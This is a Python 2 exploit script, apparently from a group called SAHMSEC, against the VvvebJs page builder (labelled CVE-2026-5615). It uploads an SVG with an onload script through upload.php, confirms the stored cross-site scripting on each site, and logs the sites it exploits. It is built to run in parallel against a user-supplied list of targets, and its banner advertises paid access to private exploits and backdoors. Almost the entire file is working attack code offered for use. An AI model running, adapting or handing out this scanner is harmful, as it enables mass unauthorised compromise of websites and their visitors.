#!/usr/bin/env python2
# -*- coding: utf-8 -*-

import requests
import threading
import random
import string
from multiprocessing.dummy import Pool as ThreadPool

# =======================
# Colors
# =======================
fr = "\033[91m"
fg = "\033[92m"
fy = "\033[93m"
rs = "\033[0m"

# =======================
# Thread-safe print
# =======================
print_lock = threading.Lock()

requests.packages.urllib3.disable_warnings()


# =======================
# Helpers
# =======================
def randstr(n=8):
    return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(n))


# =======================
# Exploit
# =======================
def Exploit(target):
    target = target.strip().rstrip("/")

    upload_url = target + "/upload.php"

    boundary = "SAHMSEC" + randstr()
    file_rand = "expbySAHMSEC"

    svg_payload = """<?xml version="1.0" standalone="no"?>
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)">
<text x="10" y="20">%s</text>
</svg>
""" % file_rand

    data = (
        "--" + boundary + "\r\n" +
        'Content-Disposition: form-data; name="file"; filename="%s.svg"\r\n' % file_rand +
        "Content-Type: image/svg+xml\r\n\r\n" +
        svg_payload + "\r\n" +
        "--" + boundary + "--\r\n"
    )

    headers = {
        "User-Agent": "Mozilla/5.0",
        "Content-Type": "multipart/form-data; boundary=" + boundary
    }

    try:
        r = requests.post(
            upload_url,
            data=data,
            headers=headers,
            timeout=10,
            verify=False
        )

        if r.status_code != 200:
            with print_lock:
                print("  - %s --> %sCant_Access%s" % (target, fr, rs))
            return

        import re
        m = re.search(r"/[a-zA-Z0-9_-]+\.svg", r.text)

        if not m:
            with print_lock:
                print("  - %s --> %sCant_Access%s" % (target, fr, rs))
            return

        upload_path = m.group(0)
        final_url = target + upload_path

        r2 = requests.get(final_url, timeout=10, verify=False)

        if (r2.status_code == 200 and
            file_rand in r2.text and
            '<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)">' in r2.text):

            with print_lock:
                print("  - %s --> %sExploited%s" % (target, fg, rs))
                print("   - %s%s%s" % (fg, final_url, rs))

            open("SAHMSEC-CVE-2026-5615_Exploited.txt", "a").write(
                target + " | " + final_url + "\n"
            )
            return

        with print_lock:
            print("  - %s --> %sNot_Vulnerable%s" % (target, fr, rs))

    except Exception:
        with print_lock:
            print("  - %s --> %sTime0ut%s" % (target, fr, rs))


# =======================
# MAIN
# =======================
banner = '''

 [ONLINE]

    [CVE-2026-5615] - VvvebJs - (<=v2.0.5) < File Injection[Stored Cross-Site Scripting(RXSS)]

         [CVSS] > 8.5 - (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)
         [Severity] > High
         [Date] > 06/04/2026
         [ExpID] > 10233271990233298

         [Notification] : Become a VIP/Premium user and get all the Source Codes,0day,1day private exploits and tools,backdoors

'''

print(banner)

path = raw_input(" - [WEBLIST] > ")
targets = open(path).read().splitlines()

pp = ThreadPool(10)
pp.map(Exploit, targets)
pp.close()
pp.join()